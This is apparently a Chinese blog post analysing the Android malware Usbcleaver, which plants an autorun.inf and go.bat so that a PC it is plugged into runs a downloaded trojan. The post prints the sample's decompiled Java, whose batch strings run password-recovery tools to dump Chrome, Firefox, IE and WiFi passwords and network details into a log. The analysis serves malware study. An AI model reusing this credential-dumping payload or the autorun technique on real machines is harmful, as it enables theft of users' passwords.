【Android病毒分析报告】 - Usbcleaver
本文章由Jack_Jia编写,转载请注明出处。
文章链接:http://blog.csdn.net/jiazhijun/article/details/9179749
作者:Jack_Jia 邮箱: 309zhijun@163.com
一、病毒样本基本信息
![](/assets/blank.gif)
二、病毒代码分析
1、查看AndroidMainfest.xml文件
由清单文件可以看出,该恶意软件的入口点只有一个.USBCleaverActivity。
2、代码分析流程
代码树结构如下:
经过对程序唯一入口点的分析,恶意代码工作流程如下:
1、点击程序图标后运行USBCleaverActivity组件,该组件主要负责病毒运行环境的创建,如病毒所需目录结构。通过payloadHander完成autorun.inf文件写入(当以USB设备连接PC时,PC根据该文件配置运行go.bat),通过downloader完成对PC木马的下载。
2、downloader类负责PC木马压缩包的下载,下载后通过decompress完成PC木马压缩包解压
下载的PC木马压缩包信息如下:
3、payload通过payloadHandler产生go.bat,go.bat文件在autorun.info中配置运行。
public String dumpChromePassword(){this.dumpChromePassword = "ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\nECHO + [Dump Chrome PW] + >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\n.\\ChromePass.exe /stext %tmplog% >> %log% 2>&1\r\nCOPY %log%+%tmplog%* %log% >> NUL\r\nDEL /f /q %tmplog% >NUL\r\n\r\n";return this.dumpChromePassword;}public String dumpFFPassword(){this.dumpFFPassword = "ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1\r\nEcho +----------------------------------+ >> %log% 2>&1\r\nEcho + [Dump Firefox PW] + >> %log% 2>&1\r\nEcho +----------------------------------+ >> %log% 2>&1\r\n%progdir%\\PasswordFox.exe /stext %tmplog% >> %log% 2>&1\r\nCOPY %log%+%tmplog%* %log% >> NUL\r\nDEL /f /q %tmplog% >NUL\r\n\r\n";return this.dumpFFPassword;}public String dumpIEPassword(){this.dumpIEPassword = "ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\nECHO + [Dump IE PW] + >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\n.\\iepv.exe /stext %tmplog% >> %log% 2>&1\r\nCOPY %log%+%tmplog%* %log% >> NUL\r\nDEL /f /q %tmplog% >NUL\r\n\r\n";return this.dumpIEPassword;}public String dumpSysInfo(){this.dumpSysInfo = "ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\nECHO + [System info] + >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\nIPCONFIG /all >> %log% 2>&1\r\n\r\n";return this.dumpSysInfo;}public String dumpWifiPassword(){this.dumpWifiPassword = "ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\nECHO + [Dump WIFI PW] + >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\n.\\WirelessKeyView.exe /stext %tmplog% >> %log% 2>&1\r\nCOPY %log%+%tmplog%* %log% >> NUL\r\nDEL /f /q %tmplog% >NUL\r\n\r\n";return this.dumpWifiPassword;}
go.bat文件内容就是执行下载PC木马的执行。到此PC平台木马的运行环境搭建完毕。当手持设备以USB模式连接PC后,PC木马即可成功运行。
2、DNS
3、Google Chrome password
4、Host name
6、Microsoft Internet Explorer password
7、Mozilla Firefox password
8、Physical address
9、Subnet mask
10、WiFi password
五、相关链接
http://www.symantec.com/security_response/writeup.jsp?docid=2013-062010-1818-99
http://news.ccidnet.com/art/1032/20130625/5029495_1.html
【Android病毒分析报告】 - Usbcleaver相关推荐
- 【Android病毒分析报告】 - ZxtdPay 吸费恶魔
本文章由Jack_Jia编写,转载请注明出处. 文章链接:http://blog.csdn.net/jiazhijun/article/details/11581543 作者:Jack_Jia ...
- 【Android病毒分析报告】 - KorBankDemon “吸金幽灵”打劫银行
本文章由Jack_Jia编写,转载请注明出处. 文章链接:http://blog.csdn.net/jiazhijun/article/details/12112733 作者:Jack_Jia ...
- android.troj.opfake.a病毒,FakeMsdMiner挖矿病毒分析报告
原标题:FakeMsdMiner挖矿病毒分析报告 近日,亚信安全截获新型挖矿病毒FakeMsdMiner,该病毒利用永恒之蓝,永恒浪漫等NSA漏洞进行攻击传播.该病毒具有远控功能,可以获取系统敏感信息 ...
- 病毒分析报告-熊猫烧香
分析报告 样本名 Worm.Win32.Fujack.p 时间 2017-5-27 平台 Windows 10 病毒分析报告 目录 1.样本概况 3 1.1 样本信息 3 1.2 测试环境 ...
- Morto蠕虫病毒分析报告
文章目录 样本信息 病毒现场复现 分析过程 Loader部分 Payload部分 病毒查杀 样本信息 名称:cache.txt SHA1:a5f83e3baae0df2cdcf5b7e9e862705 ...
- Virut.ce-感染型病毒分析报告
1.样本概况 病毒名称 Virus.Win32.Virut.ce MD5 6A500B42FC27CC5546079138370C492F 文件大小 131 KB (134,144 字节) 壳信息 无 ...
- 关于“WireX Botnet”事件Android样本分析报告
WireX家族病毒基本上都会在内部硬编码存放两个URL地址(部分变种的URL经过加密),变种A在内部硬编码了如下两个URL http://u.*******.store/?utm_source=tfi ...
- c语言写骷髅病毒源码,骷髅病毒分析报告
一:目录 1.样本信息 2.行为分析 3.样本分析 4.详细分析 二:样本信息 1.样本名称:样本.exe(脱壳后为样本dump.exe) 2.md5:5b8bc92296c2fa60fecc6316 ...
- 【安卓病毒分析报告】FakeBank-盗取韩国银行信息的手机病毒
FakeBank 文件信息 病毒恶意行为 该病毒运行后弹出设备管理器激活界面,图标隐藏,电话薄联系人列表截取,SMS发送及收件箱所有信息拦截,干扰通话,下载恶性伪装韩国银行软件,利用漏洞设备管理器激活 ...
最新文章
- 注册HttpSessionListener失效原因
- thinkphp F方法
- java之RSA和Base64加密帮助类
- MMKV集成与原理,赶紧学起来
- 如何关闭借呗订阅开通通知_支付宝花呗借呗隐藏规则,芝麻分600以上,花呗3.6万,借呗12万!...
- 抗锯齿 文字_PS之使用文字工具
- 枚举、位操作 CLR学习第十二课
- 奇异值分解 本质矩阵_Singular Value Decomposition(奇异值分解)
- 干货|在美国不要读博的12条理由
- load data infile mysql_mysql Load Data InFile 的用法举例
- python几种数据结构_Python中的4种数据结构
- iOS 游戏开发教程资源
- jdk32位安装包下载_premiere pro 2017 软件下载及安装教程
- Python生成Wifi二维码 一键联网
- word的大纲视图用法你晓得了吗
- Android手机SD卡分区
- 玩转Fasttext
- html图片上传java_PhoneGap 上传图片HTML和服务器端端实现(JAVA)
- 题解 luoguP2928 【[USACO09HOL]牛的打手Cattle Bruisers】
- YOLOv5的项目实践 | 手势识别项目落地全过程(附源码)